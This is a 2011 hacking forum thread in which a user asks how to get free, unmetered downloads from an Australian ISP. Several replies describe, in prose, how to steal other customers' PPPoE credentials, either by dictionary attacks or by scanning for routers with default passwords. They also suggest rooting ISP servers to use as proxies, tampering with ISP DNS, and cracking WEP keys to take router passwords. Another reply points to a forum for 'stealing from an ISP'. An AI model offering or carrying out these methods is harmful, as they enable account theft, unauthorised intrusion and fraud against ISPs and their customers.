Jump to content


Photo
- - - - -

Tricking Your Internet Provider


  • Please log in to reply
17 replies to this topic

#1 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 08 December 2011 - 09:56 PM

Hi all,

I just came up with an idea of which someone else might find helpful but I don't know how to do it. The question is would it be possible to trick your internet provider in thinking something your downloading is from there server thus allowing it to be un-metered. Keep in mind this is a 'theoretical' question >.> <.< >.>.

So considering I'm not currently on an unlimited internet usage deal and they have servers that if hosting the data I want I can download from there with it not counting towards my download/upload limit.

Any thoughts or ideas would be appreciated.

I'm looking at changing over internet providers soon anyway because the current contract ended.

Powermaniac

#2 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 08 December 2011 - 11:22 PM

who is your current ISP?

#3 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 09 December 2011 - 03:39 AM

Telstra Bigpond...I can provide a link if necessary.

#4 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 10 December 2011 - 07:26 PM

Telstra Bigpond...I can provide a link if necessary.


is it cable or adsl?

#5 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 12 December 2011 - 05:41 AM

ADSL...

#6 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 02:16 PM

1) If an ISP is using PPPoE one could make a little application to perform a dictionary attack against other PPPoE accounts. A person would just need to find out what their standard is for naming PPPoE accounts, ie... usually it's an email address, first part of email address before the "@", or customer's names. Then they'd need to figure out the providers password policy for issuing PPPoE passwords. That's easy if a person already already has a PPPoE account... If unsure how it was formulated one could just call and saying they need to change the PPPoE password. If the ISP lets customers choose whatever one they'd like, the attack will probably be successful. If the ISP issues a PPPoE password like, "Md576!df76&45wKL0p$", probably not too likely this will work.

2) A person could get IP address rages from the provider. Scan the address range looking for SoHo routers. Find said router with default password. Go into to router. use app that will recover a password behind asterisks. Boom! Someone's PPPoE account/password has been compromised. It would take about 10 mins to write a PERL script to automate a majority of this process.

3) find out how they determine where a server is located. They'll either use IP ranges or DNS white-listed, most likely.

If using IP ranges, one the ISP's servers could be used as a socks server (assuming someone can get root), to bounce connections from virtually any protocol using something like sockscap on the client.

If using DNS and their DNS server can be compromised, it would be possible to make bogus DNS records, but would fuck it up for anyone else trying to get to that address using compromised DNS. So you could just use open DNS or Google DNS.

If any box from the LAN which the DNS servers reside are vulnerable from the outside there is a lot of DNS tampering that can be attempted as well.



Anything I mentioned will send a person straight to the federal hooscal in most any country. So This post was purely for educational discussion of a scientific nature, and in response to a hypothetical question. Don't try this at home! :D

Edited by tekio, 12 December 2011 - 02:25 PM.


#7 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 12 December 2011 - 04:38 PM

1) If an ISP is using PPPoE one could make a little application to perform a dictionary attack against other PPPoE accounts. A person would just need to find out what their standard is for naming PPPoE accounts, ie... usually it's an email address, first part of email address before the "@", or customer's names. Then they'd need to figure out the providers password policy for issuing PPPoE passwords. That's easy if a person already already has a PPPoE account... If unsure how it was formulated one could just call and saying they need to change the PPPoE password. If the ISP lets customers choose whatever one they'd like, the attack will probably be successful. If the ISP issues a PPPoE password like, "Md576!df76&45wKL0p$", probably not too likely this will work.

2) A person could get IP address rages from the provider. Scan the address range looking for SoHo routers. Find said router with default password. Go into to router. use app that will recover a password behind asterisks. Boom! Someone's PPPoE account/password has been compromised. It would take about 10 mins to write a PERL script to automate a majority of this process.

3) find out how they determine where a server is located. They'll either use IP ranges or DNS white-listed, most likely.

If using IP ranges, one the ISP's servers could be used as a socks server (assuming someone can get root), to bounce connections from virtually any protocol using something like sockscap on the client.

If using DNS and their DNS server can be compromised, it would be possible to make bogus DNS records, but would fuck it up for anyone else trying to get to that address using compromised DNS. So you could just use open DNS or Google DNS.

If any box from the LAN which the DNS servers reside are vulnerable from the outside there is a lot of DNS tampering that can be attempted as well.



Anything I mentioned will send a person straight to the federal hooscal in most any country. So This post was purely for educational discussion of a scientific nature, and in response to a hypothetical question. Don't try this at home! :D



how exactly would all of this work? Verizon DSL uses open PPPoE for most accounts that I have come across in the last few years.. meaning that the username and password do not mean anything, and you can put anything as the username and password and you would still connect, since it is a direct line between you and the central office, there is little reason to authenticate with a password...

i have a theory on how to exploit this, but it would probably be too expensive and bulky for most applications..
my thought would be to get the dial tone before it goes to the customer, connect it to a DSL modem, but then you would need to find a way to convert the LAN signal back to a DSL signal to send the signal to the customer so that their internet still worked.. there would also have to be a filter on the dial tone to prevent the real DSL signal from affecting the generated DSL signal so that you would be able to send the dial tone back into the house as well...

#8 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 06:44 PM


1) If an ISP is using PPPoE one could make a little application to perform a dictionary attack against other PPPoE accounts. A person would just need to find out what their standard is for naming PPPoE accounts, ie... usually it's an email address, first part of email address before the "@", or customer's names. Then they'd need to figure out the providers password policy for issuing PPPoE passwords. That's easy if a person already already has a PPPoE account... If unsure how it was formulated one could just call and saying they need to change the PPPoE password. If the ISP lets customers choose whatever one they'd like, the attack will probably be successful. If the ISP issues a PPPoE password like, "Md576!df76&45wKL0p$", probably not too likely this will work.

2) A person could get IP address rages from the provider. Scan the address range looking for SoHo routers. Find said router with default password. Go into to router. use app that will recover a password behind asterisks. Boom! Someone's PPPoE account/password has been compromised. It would take about 10 mins to write a PERL script to automate a majority of this process.

3) find out how they determine where a server is located. They'll either use IP ranges or DNS white-listed, most likely.

If using IP ranges, one the ISP's servers could be used as a socks server (assuming someone can get root), to bounce connections from virtually any protocol using something like sockscap on the client.

If using DNS and their DNS server can be compromised, it would be possible to make bogus DNS records, but would fuck it up for anyone else trying to get to that address using compromised DNS. So you could just use open DNS or Google DNS.

If any box from the LAN which the DNS servers reside are vulnerable from the outside there is a lot of DNS tampering that can be attempted as well.



Anything I mentioned will send a person straight to the federal hooscal in most any country. So This post was purely for educational discussion of a scientific nature, and in response to a hypothetical question. Don't try this at home! :D



how exactly would all of this work? Verizon DSL uses open PPPoE for most accounts that I have come across in the last few years.. meaning that the username and password do not mean anything, and you can put anything as the username and password and you would still connect, since it is a direct line between you and the central office, there is little reason to authenticate with a password...

i have a theory on how to exploit this, but it would probably be too expensive and bulky for most applications..
my thought would be to get the dial tone before it goes to the customer, connect it to a DSL modem, but then you would need to find a way to convert the LAN signal back to a DSL signal to send the signal to the customer so that their internet still worked.. there would also have to be a filter on the dial tone to prevent the real DSL signal from affecting the generated DSL signal so that you would be able to send the dial tone back into the house as well...

The the last ISP I worked at used PPPoE and CHAP for authentication from a RADIUS server for access to the Internet for DSL customers.
https://www.google.c...iw=1920&bih=946





AT&T i know was one company, at least where I live, where PPPoE was authenticated. https://www.google.c...iw=1920&bih=946

#9 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 06:46 PM


1) If an ISP is using PPPoE one could make a little application to perform a dictionary attack against other PPPoE accounts. A person would just need to find out what their standard is for naming PPPoE accounts, ie... usually it's an email address, first part of email address before the "@", or customer's names. Then they'd need to figure out the providers password policy for issuing PPPoE passwords. That's easy if a person already already has a PPPoE account... If unsure how it was formulated one could just call and saying they need to change the PPPoE password. If the ISP lets customers choose whatever one they'd like, the attack will probably be successful. If the ISP issues a PPPoE password like, "Md576!df76&45wKL0p$", probably not too likely this will work.

2) A person could get IP address rages from the provider. Scan the address range looking for SoHo routers. Find said router with default password. Go into to router. use app that will recover a password behind asterisks. Boom! Someone's PPPoE account/password has been compromised. It would take about 10 mins to write a PERL script to automate a majority of this process.

3) find out how they determine where a server is located. They'll either use IP ranges or DNS white-listed, most likely.

If using IP ranges, one the ISP's servers could be used as a socks server (assuming someone can get root), to bounce connections from virtually any protocol using something like sockscap on the client.

If using DNS and their DNS server can be compromised, it would be possible to make bogus DNS records, but would fuck it up for anyone else trying to get to that address using compromised DNS. So you could just use open DNS or Google DNS.

If any box from the LAN which the DNS servers reside are vulnerable from the outside there is a lot of DNS tampering that can be attempted as well.



Anything I mentioned will send a person straight to the federal hooscal in most any country. So This post was purely for educational discussion of a scientific nature, and in response to a hypothetical question. Don't try this at home! :D



how exactly would all of this work? Verizon DSL uses open PPPoE for most accounts that I have come across in the last few years.. meaning that the username and password do not mean anything, and you can put anything as the username and password and you would still connect, since it is a direct line between you and the central office, there is little reason to authenticate with a password...

i have a theory on how to exploit this, but it would probably be too expensive and bulky for most applications..
my thought would be to get the dial tone before it goes to the customer, connect it to a DSL modem, but then you would need to find a way to convert the LAN signal back to a DSL signal to send the signal to the customer so that their internet still worked.. there would also have to be a filter on the dial tone to prevent the real DSL signal from affecting the generated DSL signal so that you would be able to send the dial tone back into the house as well...

The the last ISP I worked at used PPPoE and CHAP for authentication from a RADIUS server for access to the Internet for DSL customers.

AT&T i know was one company, at least where I live, where PPPoE was authenticated. https://www.google.c..._KYSq2QX8yfHdCA

#10 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 13 December 2011 - 12:54 AM

For some reason all those posts went right over my head and I didn't understand a word of it...

Rereads all posts again...

#11 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 13 December 2011 - 06:06 PM

For some reason all those posts went right over my head and I didn't understand a word of it...

Rereads all posts again...



*cough* http://www.sbhacker.net *cough cough*

#12 wwwd40

wwwd40

    DDP Fan club member

  • Members
  • 53 posts
  • Gender:Male

Posted 14 December 2011 - 05:05 AM

The the last ISP I worked at used PPPoE and CHAP for authentication from a RADIUS server for access to the Internet for DSL customers.

AT&T i know was one company, at least where I live, where PPPoE was authenticated. https://www.google.c..._KYSq2QX8yfHdCA


In my experience PPPoA services in the UK authenticate in the same way as described - the key being the PPP bit. That said, Ive seen services provided by BT that require no username or password to be configured and use different l2 encapsulation (these are mainly legacy services from what I can tell). Remember its normally going to be the domain part of the username that will drop you into the correct l2 tunnel towards your isp to then use the username bit for the ISP Radius authentication side of things.

That said I cant help with OP question beyond whats already been suggested. I would advise against brute forcing ISP accounts from your own home as its a good way to get a cease and desist or kicked off your ISP - its a pretty noisy way of doing things.

#13 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 15 December 2011 - 07:29 AM

Thanks for the link AfterM4th shall join that forum if it is trustworthy and which I assume it is for you to provide a link to it...

Anyway I'm not planning on brute forcing maybe I was misunderstood...

I was asking if there was a way to have a link you are downloading from be proxied as there own server thus being unmetered...? Because of there Unmetered Usage deal so if you download from there servers it doesn't affect your download usage thus if I can pose a download I am doing as it being from there server I then get it for free =D...Just thought it might be possible knowing that there are so many possibilities with the internet and technology these days...

Edit: Considering I didn't understand any of what was said I'm not sure whether my question was understood or not...

Edited by Powermaniac7, 15 December 2011 - 07:35 AM.


#14 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 15 December 2011 - 02:37 PM

yes the site is legit. if you were to hypothetically steal from an ISP, the people at that site would be the best way to go. hypothetically.

#15 jfalcon

jfalcon

    Hakker addict

  • Agents of the Revolution
  • 589 posts
  • Location:Living within the ether

Posted 15 December 2011 - 04:46 PM

It sounds like packet accounting is done on the border gateway routers based on IP.

To answer your question tho: Could you spoof your traffic to look like it came from one of the "free" servers? No, as it would break the routing of packets. The BGR's know the truth anyways.

#16 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 15 December 2011 - 08:32 PM

It sounds like packet accounting is done on the border gateway routers based on IP.

To answer your question tho: Could you spoof your traffic to look like it came from one of the "free" servers? No, as it would break the routing of packets. The BGR's know the truth anyways.

curious of:
1. do they provide you with any free hosting?
2. if they do, does upload/downloads to your free hosting space get metered or is that unlimited for you to transfer to/from?
3. question probably for someone more knowledgeable to provide input.. could you run a proxy server on your hosted service and get free transfers that way? i know you can set up a proxy to run on google app engine on googles servers - i have one, i think i got the instructions from the lifehacker site or something..

#17 stormaes

stormaes

    Will I break 10 posts?

  • Members
  • 6 posts
  • Gender:Male

Posted 19 December 2011 - 10:15 PM

Theoretically, if you wanted to do things the hard way for this, you could try running around and cracking some WEP keys and grabbing the passwords from the router (most people who would use WEP use the default router password). This would be the easier/more time consuming/lower profile way of gaining ISP details.

#18 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 20 December 2011 - 10:59 PM

Theoretically, if you wanted to do things the hard way for this, you could try running around and cracking some WEP keys and grabbing the passwords from the router (most people who would use WEP use the default router password). This would be the easier/more time consuming/lower profile way of gaining ISP details.

was not my intentions at all to crack WEP keys.. was just more of a curiosity of if this vunerability existed, and if it could be created in a controled enviornment - or as a pen test of a network that you have permission to crack...




BinRev is hosted by the great people at Lunarpages!